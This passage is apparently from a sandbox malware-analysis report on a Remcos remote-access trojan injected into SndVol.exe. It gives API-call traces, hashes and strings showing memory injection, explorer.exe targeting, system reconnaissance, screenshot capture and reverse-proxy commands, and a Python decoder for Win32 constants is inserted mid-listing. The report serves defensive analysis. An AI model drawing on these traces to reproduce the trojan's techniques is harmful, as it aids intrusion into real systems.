                                                                        • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 29135679
                                                                          • Part of subcall function 29134AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 29134B36
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                                                        • API String ID: 2956720200-749203953
                                                                        • Opcode ID: d91ac2b8174dcf32e2f7920e24a119211b54097d26b1fc4c98e45e7b075fe064
                                                                        • Instruction ID: f2fac80d8cacd6a0e2798ffd394e54f1a5b97d76bc09897bb77e949ffd28cb7b
                                                                        • Opcode Fuzzy Hash: d91ac2b8174dcf32e2f7920e24a119211b54097d26b1fc4c98e45e7b075fe064
                                                                        • Instruction Fuzzy Hash: 7B410432B042407BDB58EB73CC8885E37B9AFA5658F80991CF51693584DF389B0BC796
                                                                        APIs
                                                                        • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 29143452
                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 29143460
                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 2914346D
                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 2914348D
                                                                        • CloseHandle.KERNEL32(00000000), ref: 2914349A
                                                                        • CloseHandle.KERNEL32(?), ref: 291434A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                        • String ID:
                                                                        • API String ID: 297527592-0
                                                                        • Opcode ID: 50239082fa210eb7bf811fb3cd916962421a36feb6211c0bd309d27e56f9eeb7
                                                                        • Instruction ID: 8548851547165802304d92c512c7552b4879864f0c694a8834454f714bcf6efa
                                                                        • Opcode Fuzzy Hash: 50239082fa210eb7bf811fb3cd916962421a36feb6211c0bd309d27e56f9eeb7
                                                                        • Instruction Fuzzy Hash: D2411331A08245BFE711AB27EC49F9B3BACFF8976CF105519F544D60D0DA3496038AA2
                                                                        APIs
                                                                        • _free.LIBCMT ref: 291781B5
                                                                          • Part of subcall function 29176802: HeapFree.KERNEL32(00000000,00000000,?,29180CEF,?,00000000,?,00000000,?,29180F93,?,00000007,?,?,291814DE,?), ref: 29176818
                                                                          • Part of subcall function 29176802: GetLastError.KERNEL32(?,?,29180CEF,?,00000000,?,00000000,?,29180F93,?,00000007,?,?,291814DE,?,?), ref: 2917682A
                                                                        • _free.LIBCMT ref: 291781C1
                                                                        • _free.LIBCMT ref: 291781CC
                                                                        • _free.LIBCMT ref: 291781D7
                                                                        • _free.LIBCMT ref: 291781E2
                                                                        • _free.LIBCMT ref: 291781ED
                                                                        • _free.LIBCMT ref: 291781F8
                                                                        • _free.LIBCMT ref: 29178203
                                                                        • _free.LIBCMT ref: 2917820E
                                                                        • _free.LIBCMT ref: 2917821C
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: c096f773da8772f54d7d45a73a95ee138cb0d9a9096ee1a09c8aff1f94997eaa
                                                                        • Instruction ID: d4e470cb7e04cdf7e2fc2f51627016eb1a0551052d2a778b312ba7df6fa1f017
                                                                        • Opcode Fuzzy Hash: c096f773da8772f54d7d45a73a95ee138cb0d9a9096ee1a09c8aff1f94997eaa
                                                                        • Instruction Fuzzy Hash: D011D4B6900309BFCB41DF56CC92CD93BB5FF14398B0194A0FA488B220DB71DB529B81
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                        • Instruction ID: 8ac24f8365ce157657b4dd037c5f16e7127bd7abf277d610ccdf95adca110ea7
                                                                        • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                        • Instruction Fuzzy Hash: B811B976501108BFDF01FF55C840CDD3B66EF04399B4144AABA0A8FA62D631EA509F42
                                                                        APIs
                                                                        • __Init_thread_footer.LIBCMT ref: 04426403
                                                                        • __Init_thread_footer.LIBCMT ref: 04426440
                                                                          • Part of subcall function 0445551E: __onexit.LIBCMT ref: 04455524
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Init_thread_footer$__onexit
                                                                        • String ID: 0lG$0lG$0lG$0lG$0lG$kG
                                                                        • API String ID: 1878262506-4252883706
                                                                        • Opcode ID: 8d317a6f5b7ecda909677f14a043b1173aca65308a73afb302eb3a2399ca05ea
                                                                        • Instruction ID: 30048cbdfaf2de7aca1f9f7381b5b65bd96656d965ed644862e9a8b2d8c1cd3f
                                                                        • Opcode Fuzzy Hash: 8d317a6f5b7ecda909677f14a043b1173aca65308a73afb302eb3a2399ca05ea
                                                                        • Instruction Fuzzy Hash: 7C91FA71604224BFEF11BF35AE40A6B3B9AEB40308F82443FF949972A2DF756C448759
                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 2914A04A
                                                                        • GdiplusStartup.GDIPLUS(291A4ACC,?,00000000), ref: 2914A07C
                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 2914A108
                                                                        • Sleep.KERNEL32(000003E8), ref: 2914A18E
                                                                        • GetLocalTime.KERNEL32(?), ref: 2914A196
                                                                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 2914A285
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                        • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                        • API String ID: 489098229-3790400642
                                                                        • Opcode ID: e069ecdefa322e2e4c97c9ad4af8dd931b2462595061248e230971d52e8dec4c
                                                                        • Instruction ID: a9ed03c39323cc29b0d197d9eb5777f4dd0255e90035bf886a7fd04694186998
                                                                        • Opcode Fuzzy Hash: e069ecdefa322e2e4c97c9ad4af8dd931b2462595061248e230971d52e8dec4c
                                                                        • Instruction Fuzzy Hash: 6C51C870E00158BAEB84EBB6CC949FD7B7D6F65218F84A029E405A7180EF349F4BD794
                                                                        APIs
                                                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 29147530
                                                                          • Part of subcall function 2914C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,2913A87E), ref: 2914C52F
                                                                        • Sleep.KERNEL32(00000064), ref: 2914755C
                                                                        • DeleteFileW.KERNEL32(00000000), ref: 29147590
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CreateDeleteExecuteShellSleep
                                                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                        • API String ID: 1462127192-2001430897
                                                                        • Opcode ID: 5f8bbe885e4f5d21c0de63c2cc3d0c0df9963f011c6852822089f850e5a58ed2
                                                                        • Instruction ID: 12ce5173a1fdd8d0085df87f748a589a6f3ecfc5fe8da92b49f4fea1151cdc30
                                                                        • Opcode Fuzzy Hash: 5f8bbe885e4f5d21c0de63c2cc3d0c0df9963f011c6852822089f850e5a58ed2
                                                                        • Instruction Fuzzy Hash: 99315871D10118BAEB48EB62DC95DED7738AF24208FC0A559D50A670D4EF206F8FCA98
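The API lines in these listings print their arguments as raw stack slots, so reading them means knowing that `OpenProcess(00001000,...)` asks for PROCESS_QUERY_LIMITED_INFORMATION, that `RegOpenKeyExA(80000001,...,00020019,...)` opens HKEY_CURRENT_USER for KEY_READ, that `CreateFileMappingW(?,00000000,00000002,...)` followed by `MapViewOfFile(00000000,00000004,...)` maps a file read-only, and that `CreateFileW(00000000,80000000,00000003,00000000,00000003,00000080,...)` opens an existing file for reading. As an added example, not part of the Joe Sandbox report or of its IDA plugin, this Python script parses lines in the plugin's format (plain entries, `Part of subcall function` entries and LIBCMT entries without an argument list) and annotates the arguments it knows with their Windows SDK names. The decoder table and constant values are the example's own, the sample lines are copied from the listings above, and only the leading slots that correspond to each documented prototype are decoded; the plugin prints more slots than a function takes, and the extras are caller stack noise.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# One "APIs" line of the Joe Sandbox IDA-plugin listing, in the shapes seen above:
#   • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 2914C286
#   •   Part of subcall function 2914C26E: OpenProcess.KERNEL32(00000400,...), ref: 2914C299
#   • __dosmaperr.LIBCMT ref: 2916A926
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")  # the plugin prints stack slots as 8 hex digits

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]            # raw stack slots; "?" = value not resolved by the plugin
    ref: int                   # address of the call instruction
    subcall_of: Optional[int]  # set when the line is "Part of subcall function X"

def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one listing line; None for lines that are not API entries."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    return ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                   int(m["sub"], 16) if m["sub"] else None)

# Win32 constants for the calls in this listing (values as in the Windows SDK headers).
PROCESS_ACCESS = {0x1: "PROCESS_TERMINATE", 0x2: "PROCESS_CREATE_THREAD", 0x8: "PROCESS_VM_OPERATION",
                  0x10: "PROCESS_VM_READ", 0x20: "PROCESS_VM_WRITE", 0x400: "PROCESS_QUERY_INFORMATION",
                  0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}
TH32CS = {0x1: "TH32CS_SNAPHEAPLIST", 0x2: "TH32CS_SNAPPROCESS", 0x4: "TH32CS_SNAPTHREAD", 0x8: "TH32CS_SNAPMODULE"}
HKEYS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
KEY_ACCESS = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
FILE_MAP = {0x02: "FILE_MAP_WRITE", 0x04: "FILE_MAP_READ", 0x20: "FILE_MAP_EXECUTE"}
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
FILE_SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

def decode_flags(value: int, table: Dict[int, str]) -> str:
    """Expand a bitmask into names. Composite masks (KEY_READ, KEY_ALL_ACCESS) are tried
    first so they are not reported next to the single bits they already contain."""
    names, covered = [], 0
    for mask, name in sorted(table.items(), key=lambda kv: -bin(kv[0]).count("1")):
        if value & mask == mask and mask & ~covered:
            names.append(name)
            covered |= mask
    if value & ~covered:
        names.append(hex(value & ~covered))  # bits the table does not know
    return "|".join(names) if names else "0"

# (API name, argument index) -> decoder. Indices follow the documented prototypes; the plugin
# prints more slots than a function takes, the extras are caller stack noise and are ignored.
DECODERS = {
    ("OpenProcess", 0): lambda v: decode_flags(v, PROCESS_ACCESS),
    ("CreateToolhelp32Snapshot", 0): lambda v: decode_flags(v, TH32CS),
    ("RegOpenKeyExA", 0): lambda v: HKEYS.get(v, hex(v)),
    ("RegOpenKeyExA", 3): lambda v: decode_flags(v, KEY_ACCESS),
    ("CreateFileMappingW", 2): lambda v: decode_flags(v, PAGE_PROTECT),
    ("MapViewOfFile", 1): lambda v: decode_flags(v, FILE_MAP),
    ("CreateFileW", 1): lambda v: decode_flags(v, GENERIC),
    ("CreateFileW", 2): lambda v: decode_flags(v, FILE_SHARE),
    ("CreateFileW", 4): lambda v: CREATION.get(v, hex(v)),
    ("Sleep", 0): lambda v: f"{v} ms",
}

def annotate(call: ApiCall) -> Dict[int, str]:
    """{argument index: symbolic value} for every argument the table can read."""
    out = {}
    for i, raw in enumerate(call.args):
        dec = DECODERS.get((call.name, i))
        if dec and HEX_RE.match(raw):
            out[i] = dec(int(raw, 16))
    return out

def decode_listing(text: str) -> List[Tuple[str, Dict[int, str]]]:
    calls = [c for c in map(parse_api_line, text.splitlines()) if c]
    return [(c.name, annotate(c)) for c in calls]

# Constructed input: lines copied from the listings above.
SAMPLE = """\
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,291A5338), ref: 2913F4F4
  • Part of subcall function 2914C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 2914C286
  • Part of subcall function 2914C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 2914C299
  • Part of subcall function 29143733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,291A52F0), ref: 2914374F
• CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 29143452
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 29143460
  • Part of subcall function 2914C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,2913A87E), ref: 2914C52F
• Sleep.KERNEL32(000001F4), ref: 2913AD7E
• __dosmaperr.LIBCMT ref: 2916A926
"""
```

`decode_listing(SAMPLE)` turns the two OpenProcess entries into `PROCESS_QUERY_LIMITED_INFORMATION` and `PROCESS_QUERY_INFORMATION`, which is the query-only access the enumeration loop needs and not the `PROCESS_VM_*`/`PROCESS_CREATE_THREAD` mask an injector would request; the injection itself happens elsewhere in this sample. Unknown bits are left as hex rather than dropped, so an access mask the table has never seen still shows up as something to look at.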
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(291A2B14,00000000,291A52D8,00003000,00000004,00000000,00000001), ref: 29137418
                                                                        • GetCurrentProcess.KERNEL32(291A2B14,00000000,00008000,?,00000000,00000001,00000000,29137691,C:\Windows\SysWOW64\SndVol.exe), ref: 291374D9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CurrentProcess
                                                                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                        • API String ID: 2050909247-4242073005
                                                                        • Opcode ID: 7753eb2563f676f28239786bff3ea2a83d3949bff1a9ac155844a3b548300a2c
                                                                        • Instruction ID: 8e73c6a391939f1ae1d47b5f641fae6893530c024b8fb0f6d59dca767b13802a
                                                                        • Opcode Fuzzy Hash: 7753eb2563f676f28239786bff3ea2a83d3949bff1a9ac155844a3b548300a2c
                                                                        • Instruction Fuzzy Hash: B831AF71301384ABE359EF67DC84F5A77B9BF10259FA04818F90192548CB38DE02CB75
                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 2914D507
                                                                          • Part of subcall function 2914D5A0: RegisterClassExA.USER32(00000030), ref: 2914D5EC
                                                                          • Part of subcall function 2914D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 2914D607
                                                                          • Part of subcall function 2914D5A0: GetLastError.KERNEL32 ref: 2914D611
                                                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 2914D53E
                                                                        • lstrcpynA.KERNEL32(291A4B60,Remcos,00000080), ref: 2914D558
                                                                        • Shell_NotifyIconA.SHELL32(00000000,291A4B48), ref: 2914D56E
                                                                        • TranslateMessage.USER32(?), ref: 2914D57A
                                                                        • DispatchMessageA.USER32(?), ref: 2914D584
                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 2914D591
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                        • String ID: Remcos
                                                                        • API String ID: 1970332568-165870891
                                                                        • Opcode ID: 25f8f76299612918c816bba62639d310168af73c7db930f189a103ac59ccf6c8
                                                                        • Instruction ID: 351c7a75b3390ce5bd811e1deb9c3899e68646ae8a400dd6c9a1337493548c35
                                                                        • Opcode Fuzzy Hash: 25f8f76299612918c816bba62639d310168af73c7db930f189a103ac59ccf6c8
                                                                        • Instruction Fuzzy Hash: 75013C71A0018CABEB10ABA3EC4DF9ABBBCFB85708F014019F91696188DB7C9505DB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7a1170d159764f44e8cb0f0d8f8196c31ba10989d1a74efc4fe08871d68b44c6
                                                                        • Instruction ID: 61503cd584293122b84e17f69c60a112c86a309a66f1f9ec117bac5588b4b189
                                                                        • Opcode Fuzzy Hash: 7a1170d159764f44e8cb0f0d8f8196c31ba10989d1a74efc4fe08871d68b44c6
                                                                        • Instruction Fuzzy Hash: B7C1C174E0438EABDB05DFAAC840BED7BB0AF59318F149589E914A73C1C7349B42CB61
                                                                        APIs
                                                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,291840DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 29183EAF
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,291840DC,00000000,00000000,?,00000001,?,?,?,?), ref: 29183F32
                                                                        • __alloca_probe_16.LIBCMT ref: 29183F6A
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,291840DC,?,291840DC,00000000,00000000,?,00000001,?,?,?,?), ref: 29183FC5
                                                                        • __alloca_probe_16.LIBCMT ref: 29184014
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,291840DC,00000000,00000000,?,00000001,?,?,?,?), ref: 29183FDC
                                                                          • Part of subcall function 291761B8: HeapAlloc.KERNEL32(00000000,29165329,?,?,291688C7,?,?,00000000,?,?,2913DE9D,29165329,?,?,?,?), ref: 291761EA
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,291840DC,00000000,00000000,?,00000001,?,?,?,?), ref: 29184058
                                                                        • __freea.LIBCMT ref: 29184083
                                                                        • __freea.LIBCMT ref: 2918408F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                                                                        • String ID:
                                                                        • API String ID: 3256262068-0
                                                                        • Opcode ID: ad23beb065c7c156370f83a788db507be94707203095234ad8a2fd32242fbbc7
                                                                        • Instruction ID: 6330d6b17487b51bb22baf323207d8eb22ad6be40525ebdce04a7917e09ce2c9
                                                                        • Opcode Fuzzy Hash: ad23beb065c7c156370f83a788db507be94707203095234ad8a2fd32242fbbc7
                                                                        • Instruction Fuzzy Hash: DA91E272E102069AFB148E76CD81EEFBBB5BF18358F084559E904E7180DB35CA439FA0
                                                                        APIs
                                                                          • Part of subcall function 29178295: GetLastError.KERNEL32(00000020,?,2916A875,?,?,?,2916F9F8,?,?,00000020,00000000,?,?,?,2915DD92,0000003B), ref: 29178299
                                                                          • Part of subcall function 29178295: _free.LIBCMT ref: 291782CC
                                                                          • Part of subcall function 29178295: SetLastError.KERNEL32(00000000,2916F9F8,?,?,00000020,00000000,?,?,?,2915DD92,0000003B,?,00000041,00000000,00000000), ref: 2917830D
                                                                          • Part of subcall function 29178295: _abort.LIBCMT ref: 29178313
                                                                        • _memcmp.LIBVCRUNTIME ref: 291754A4
                                                                        • _free.LIBCMT ref: 29175515
                                                                        • _free.LIBCMT ref: 2917552E
                                                                        • _free.LIBCMT ref: 29175560
                                                                        • _free.LIBCMT ref: 29175569
                                                                        • _free.LIBCMT ref: 29175575
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                                        • String ID: C
                                                                        • API String ID: 1679612858-1037565863
                                                                        • Opcode ID: c88b6a6af0d4c7144bee18b8e3d8d0cf100318e11a717ef4d96a75e0af1948c7
                                                                        • Instruction ID: 152e72e0c90ba99e7897fe5aeb19b15264b7467e9812a87d38ae9d66c4ea4afb
                                                                        • Opcode Fuzzy Hash: c88b6a6af0d4c7144bee18b8e3d8d0cf100318e11a717ef4d96a75e0af1948c7
                                                                        • Instruction Fuzzy Hash: 93B12675E0131ADBDB64CF19C884ADDB7B4FF48308F5085AAD90AA7250E770AE91CF90
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$_abort_memcmp
                                                                        • String ID: C
                                                                        • API String ID: 137591632-1037565863
                                                                        • Opcode ID: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                                                        • Instruction ID: 9dd8c3b1efc2ccfdfe12d9e7c84e5b9119e0c3146ead46a21b535bf12d39451c
                                                                        • Opcode Fuzzy Hash: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                                                        • Instruction Fuzzy Hash: E7B11775A012299FDF24DF18C884AAEB7B4FB48304F5045AED90AA7351E731BE90CF41
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tcp$udp
                                                                        • API String ID: 0-3725065008
                                                                        • Opcode ID: f651fc293508d88ab3ece847739033786bddf4e73088d3f27c43d4e3b41e7eb7
                                                                        • Instruction ID: 8fdcc3a75b3588947373b0174bba6e7184139db20181c5dbf9a15062efd4f9bb
                                                                        • Opcode Fuzzy Hash: f651fc293508d88ab3ece847739033786bddf4e73088d3f27c43d4e3b41e7eb7
                                                                        • Instruction Fuzzy Hash: C8718170E083428FD7188F56C486B6AB7E4EF8C399F10646EF98997291D774CB06CB52
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Eventinet_ntoa
                                                                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                        • API String ID: 3578746661-168337528
                                                                        • Opcode ID: 2bfcb552fcf0bdaa772e89bb0de36070af4d49be984e3cdaa48c4c8999bac40c
                                                                        • Instruction ID: 58947249f6ba7e913e86c3494f0da0e7ff37256d2926a3e729453b0b604610b9
                                                                        • Opcode Fuzzy Hash: 2bfcb552fcf0bdaa772e89bb0de36070af4d49be984e3cdaa48c4c8999bac40c
                                                                        • Instruction Fuzzy Hash: E751E731F042406BE748FB37CD55A6D37A66FB8248F80A929E4115B295DF389F0BC786
                                                                        APIs
                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,2918707F), ref: 29185FA7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DecodePointer
                                                                        • String ID: acos$asin$log$log10$pow$sqrt
                                                                        • API String ID: 3527080286-3190521889
                                                                        • Opcode ID: b6c306ec3728682bc213230ff7c36e17b178fd2dcf8ea959d82a0d621c903609
                                                                        • Instruction ID: 57959b9f4a5d6211c709896f9406af7512169486aa34a2b3169383ea23ddc635
                                                                        • Opcode Fuzzy Hash: b6c306ec3728682bc213230ff7c36e17b178fd2dcf8ea959d82a0d621c903609
                                                                        • Instruction Fuzzy Hash: 84515D70910609DBEB04DF66E9885ECBFB0FF49388F510185E581BB65ACB358B22DF19
                                                                        APIs
                                                                          • Part of subcall function 29147F67: __EH_prolog.LIBCMT ref: 29147F6C
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,291960B4), ref: 29147E17
                                                                        • CloseHandle.KERNEL32(00000000), ref: 29147E20
                                                                        • DeleteFileA.KERNEL32(00000000), ref: 29147E2F
                                                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 29147DE3
                                                                          • Part of subcall function 29134AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 29134B36
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                        • String ID: <$@$Temp
                                                                        • API String ID: 1704390241-1032778388
                                                                        • Opcode ID: 4f1fd085edf0fae60d8fce210d75db6418205b555639983917c47139e6699b85
                                                                        • Instruction ID: e39d3dcc94ef6a7a7d2a174cca293083ee2bbcc9649021398792bbf7e3fda112
                                                                        • Opcode Fuzzy Hash: 4f1fd085edf0fae60d8fce210d75db6418205b555639983917c47139e6699b85
